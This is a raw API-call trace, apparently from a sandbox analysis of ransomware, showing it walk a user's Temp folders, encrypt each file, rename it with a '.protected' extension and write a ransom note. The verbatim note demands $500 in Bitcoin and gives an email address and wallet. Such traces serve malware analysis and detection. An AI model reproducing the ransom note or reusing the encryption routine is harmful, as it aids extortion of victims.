pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\symNKTPrMBv.flv") returned 68 [0086.896] StrStrIW (lpFirst="symNKTPrMBv.flv", lpSrch=".protected") returned 0x0 [0086.896] lstrcmpW (lpString1="symNKTPrMBv.flv", lpString2="RESTORE_FILES.txt") returned 1 [0086.896] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.896] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\symNKTPrMBv.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\symnktprmbv.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\symNKTPrMBv.flv") returned 68 [0086.897] StrStrW (lpFirst="symNKTPrMBv.flv", lpSrch=".txt") returned 0x0 [0086.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\symNKTPrMBv.flv") returned 68 [0086.897] StrStrW (lpFirst="symNKTPrMBv.flv", lpSrch=".rar") returned 0x0 [0086.897] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\symNKTPrMBv.flv") returned 68 [0086.897] StrStrW (lpFirst="symNKTPrMBv.flv", lpSrch=".zip") returned 0x0 [0086.897] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.898] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.898] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.899] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.899] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.899] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.899] CloseHandle (hObject=0xd8) returned 1 [0086.899] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\symNKTPrMBv.flv.protected") returned 78 [0086.899] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\symNKTPrMBv.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\symnktprmbv.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\symNKTPrMBv.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\symnktprmbv.flv.protected")) returned 1 [0086.900] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.901] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Windows") returned -1 [0086.901] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Program Files") returned 1 [0086.901] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Program Files (x86)") returned 1 [0086.901] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="$Recycle.bin") returned 1 [0086.901] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="System Volume Information") returned 1 [0086.901] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files") returned 77 [0086.901] lstrcmpW (lpString1="Temporary Internet Files", lpString2=".") returned 1 [0086.901] lstrcmpW (lpString1="Temporary Internet Files", lpString2="..") returned 1 [0086.901] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\*") returned 79 [0086.901] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0086.901] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.901] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.901] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.901] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.901] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.901] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\.") returned 79 [0086.901] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.902] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0086.902] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0086.902] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0086.902] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0086.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.902] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.902] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.902] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.902] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.902] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.902] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.902] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\..") returned 80 [0086.902] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.902] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.902] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0086.902] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0086.902] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0086.902] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0086.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.902] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.902] lstrcmpiW (lpString1="Content.IE5", lpString2="Windows") returned -1 [0086.902] lstrcmpiW (lpString1="Content.IE5", lpString2="Program Files") returned -1 [0086.902] lstrcmpiW (lpString1="Content.IE5", lpString2="Program Files (x86)") returned -1 [0086.902] lstrcmpiW (lpString1="Content.IE5", lpString2="$Recycle.bin") returned 1 [0086.902] lstrcmpiW (lpString1="Content.IE5", lpString2="System Volume Information") returned -1 [0086.902] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5") returned 89 [0086.903] lstrcmpW (lpString1="Content.IE5", lpString2=".") returned 1 [0086.903] lstrcmpW (lpString1="Content.IE5", lpString2="..") returned 1 [0086.903] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\*") returned 91 [0086.903] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0086.903] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.903] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.903] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.903] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.903] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.903] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\.") returned 91 [0086.903] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.903] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0086.903] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0086.903] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0086.903] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.903] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.903] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.903] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.904] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.904] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.904] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.904] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.904] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\..") returned 92 [0086.904] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.904] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.904] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0086.904] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0086.904] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0086.904] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.904] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.904] lstrcmpiW (lpString1="03J4UQW0", lpString2="Windows") returned -1 [0086.904] lstrcmpiW (lpString1="03J4UQW0", lpString2="Program Files") returned -1 [0086.904] lstrcmpiW (lpString1="03J4UQW0", lpString2="Program Files (x86)") returned -1 [0086.904] lstrcmpiW (lpString1="03J4UQW0", lpString2="$Recycle.bin") returned 1 [0086.904] lstrcmpiW (lpString1="03J4UQW0", lpString2="System Volume Information") returned -1 [0086.904] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0") returned 98 [0086.904] lstrcmpW (lpString1="03J4UQW0", lpString2=".") returned 1 [0086.904] lstrcmpW (lpString1="03J4UQW0", lpString2="..") returned 1 [0086.905] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\*") returned 100 [0086.905] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0086.906] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.906] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.906] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.906] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.906] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.906] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\.") returned 100 [0086.906] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.906] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0086.906] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0086.906] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.906] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.906] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.906] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.906] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.906] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.906] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.906] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.907] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\..") returned 101 [0086.907] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.907] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.907] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0086.907] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0086.907] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.907] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.907] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.907] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0086.907] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0086.907] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0086.907] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0086.907] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0086.907] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini") returned 110 [0086.907] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0086.907] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0086.907] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.907] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0086.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini") returned 110 [0086.908] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0086.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini") returned 110 [0086.908] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0086.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini") returned 110 [0086.908] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0086.908] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x43, lpOverlapped=0x0) returned 1 [0086.909] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.909] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x43, lpOverlapped=0x0) returned 1 [0086.909] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.909] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0086.909] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0086.909] CloseHandle (hObject=0x154) returned 1 [0086.910] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini.protected") returned 120 [0086.910] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\desktop.ini.protected")) returned 1 [0086.910] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0086.910] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0086.911] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\RESTORE_FILES.txt") returned 116 [0086.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.911] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.911] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0086.912] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.912] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 